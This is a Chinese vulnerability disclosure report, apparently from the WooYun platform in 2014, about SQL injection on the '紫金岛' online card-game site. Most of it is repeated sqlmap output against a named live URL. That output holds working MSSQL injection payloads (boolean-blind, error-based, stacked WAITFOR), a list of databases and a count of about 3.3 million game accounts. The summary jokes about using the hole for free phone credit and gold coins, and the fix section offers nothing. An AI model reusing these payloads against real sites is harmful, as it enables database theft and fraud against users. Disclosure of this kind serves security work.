紫金岛SQL注射漏洞300万游戏账户可泄露

漏洞详情

披露状态:

2014-04-30: 细节已通知厂商并且等待厂商处理中
2014-05-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

"紫金岛"SQL注射漏洞,多个棋牌数据库爆库,300万游戏账户存在泄露风险。

兑话费,加金币,一夜从屌丝变高富帅.

详细说明:

漏洞站:紫金岛(http://www.91zjd.com/)



注入点:http://www.91zjd.com/smsqw/dxzc_ctcc.asp?username=admin

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [20]:
[*] DB_BACKUP
[*] master
[*] model
[*] msdb
[*] QPGameBSTEST
[*] QPGameDB
[*] QPGameHFDB
[*] QPGameJDDB
[*] QPGameTYDB
[*] QPGameUserDB
[*] QPPromotionDB
[*] QPServerInfoDB
[*] QPServerInfoDB_NEW
[*] QPTreasureDB
[*] QPTreasureMatchDB
[*] QPWebGameDB
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ZjdGameWebDB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'game_db_user'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=admin' AND 2854=2854 AND 'RfzB'='RfzB

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=admin' AND 2783=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(97)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (2783=2783) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(100)+CHAR(109)+CHAR(113))) AND 'Fgza'='Fgza

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=admin'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Select count(*) from AccountsInfo: '3339832'

修复方案:

这个大家都懂

只是注入点还有很多,不一一列出了,请自行检查。

版权声明:转载请注明来源 龙龙@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-30 15:50

厂商回复:

最新状态:

暂无


漏洞评价: